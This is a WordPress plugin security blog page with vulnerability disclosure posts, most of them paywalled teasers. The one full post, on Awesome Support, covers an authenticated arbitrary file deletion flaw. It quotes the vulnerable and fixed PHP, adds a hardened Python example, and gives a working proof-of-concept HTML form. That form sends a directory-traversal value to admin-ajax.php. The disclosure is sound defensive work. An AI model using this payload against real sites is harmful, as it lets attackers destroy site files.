16 Apr

Vulnerability Details: Authenticated Arbitrary File Deletion Vulnerability in Woo Import Export

From time to time a vulnerability in a plugin is disclosed without the discoverer putting out a complete report on it, and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information.

Last week, while looking into a report of a vulnerability that turned out to be an arbitrary file deletion ...


Our Vulnerability Details posts provide the details of vulnerabilities we didn't discover and access to them is limited to customers of our service due to other security companies trying to sponge off the work needed to create those instead of doing their own work.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, you can try the service for free for the first month (there are a lot of other reasons that you will want to sign up beyond access to posts like this one).

If you are a WordPress plugin security researcher please contact us to get free access to all of our Vulnerability Details posts.

13 Feb

Vulnerability Details: Authenticated Arbitrary File Deletion Vulnerability in Woocommerce CSV Import

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on it, and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information.

One of the areas where we think that the wordpress.org Plugin Directory could probably improve how they handle things is ...


23 Oct

Authenticated Arbitrary File Deletion Vulnerability in Awesome Support

As we mentioned in more detail in the previous post discussing the other vulnerability we found in the plugin Awesome Support, after seeing the developers give some bad advice on deciding which plugins to use from a security perspective, we took a look at their plugin and in seconds found that it wasn’t secure.

The plugin allows anyone to create a WordPress account, which increases the security risk because many plugins do not properly restrict access to their functionality to only certain logged-in users, this plugin being one of them.

This plugin makes the function wpas_tools_log_viewer_delete() accessible to anyone logged in, by registering it with WordPress’ AJAX functionality (in the file /includes/admin/functions-log-viewer.php):

add_action( 'wp_ajax_wpas_tools_log_viewer_delete', 'wpas_tools_log_viewer_delete', 10, 0 );

That function didn’t check to see if a user has a particular capability, which would limit who can access it, or check for a valid nonce to prevent cross-site request forgery (CSRF) before running the function wpas_log_viewer_delete_file():

function wpas_tools_log_viewer_delete() {

	if( ! isset( $_POST[ 'file' ] ) ) {
		echo json_encode( array( 'error' => esc_html__( 'No file given', 'awesome-support' ) ) );
		wp_die();
	}

	$file = $_POST[ 'file' ];

	wp_send_json_success(	wpas_log_viewer_delete_file( $file ) );

}

When that function determined which file to unlink (delete), there was no restriction on directory traversal:

function wpas_log_viewer_delete_file( $file ) {

	if( unlink( get_logs_path() . $file ) ) {

So any file can be deleted.

After we notified the company behind this of the issue, version 4.3.2 was released, which fixes the issue by checking if the request to access the function is coming from an Administrator and that a valid nonce is provided (to prevent CSRF):

function wpas_tools_log_viewer_delete() {

	if ( ! current_user_can( 'administrator' ) ) {
		wp_send_json_error( array( 'error' => esc_html__( 'Not found', 'awesome-support' ) ) );
	}

	check_ajax_referer( 'wpas_tools_log_viewer_delete', 'nonce' );

It also uses the basename() function to remove directory traversal from the name of the file to be deleted:

$file = basename( $_POST[ 'file' ] );
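To show what the basename() step in the fix actually does to the traversal payload, here is an added example (not the plugin’s code, written in Python rather than PHP for stand-alone running) that mirrors the hardened deletion logic and adds a containment check on the resolved path; the directory layout and file names are constructed for the demonstration.

```python
"""Hardened analogue of wpas_log_viewer_delete_file() (added example, not
the plugin's own code). Step 1 is what basename() does in version 4.3.2;
step 2 is an extra containment check on the resolved path."""
import os
import tempfile


def resolve_log_file(logs_dir: str, user_file: str):
    """Return the absolute path to delete, or None if the name is unusable.

    '../../../../test.txt' is folded to 'test.txt' inside logs_dir, so the
    traversal no longer reaches the WordPress root. The realpath comparison
    also refuses anything (for example a symlinked log entry) that would
    resolve outside the logs directory."""
    name = os.path.basename(user_file.replace("\\", "/"))
    if name in ("", ".", ".."):
        return None
    root = os.path.realpath(logs_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:
        return None
    return target


def delete_log(logs_dir: str, user_file: str) -> bool:
    """Delete a log by user-supplied name; False if refused or not present."""
    target = resolve_log_file(logs_dir, user_file)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo() -> dict:
    """Constructed layout: logs/ four levels below a test.txt, the same
    relationship the proof of concept relies on."""
    base = tempfile.mkdtemp()
    logs = os.path.join(base, "a", "b", "c", "d", "logs")
    os.makedirs(logs)
    victim = os.path.join(base, "a", "test.txt")  # ../../../../test.txt from logs/
    open(victim, "w").close()
    open(os.path.join(logs, "debug.log"), "w").close()
    results = {}
    results["poc_deleted_anything"] = delete_log(logs, "../../../../test.txt")
    results["victim_intact"] = os.path.exists(victim)
    results["legit_deleted"] = delete_log(logs, "debug.log")
    results["dotdot_refused"] = resolve_log_file(logs, "..") is None
    return results
```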

Proof of Concept

The following proof of concept will cause a file named test.txt in the root directory of the WordPress installation to be deleted, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpas_tools_log_viewer_delete" />
<input type="hidden" name="file" value="../../../../test.txt" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • October 17, 2017 – Developer notified.
  • October 17, 2017 – Developer responds.
  • October 22, 2017 – Version 4.3.2 released, which fixes vulnerability.

02 Jan

Vulnerability Details: Authenticated Arbitrary File Deletion Vulnerability in BuddyPress

From time to time vulnerabilities are fixed in plugins without someone putting out a report on the vulnerability, and we will put out a post detailing it. While putting out the details of the vulnerability increases the chances of it being exploited, it also can help to identify vulnerabilities that haven’t been fully fixed (in some cases not fixed at all) and help to identify additional vulnerabilities in ...
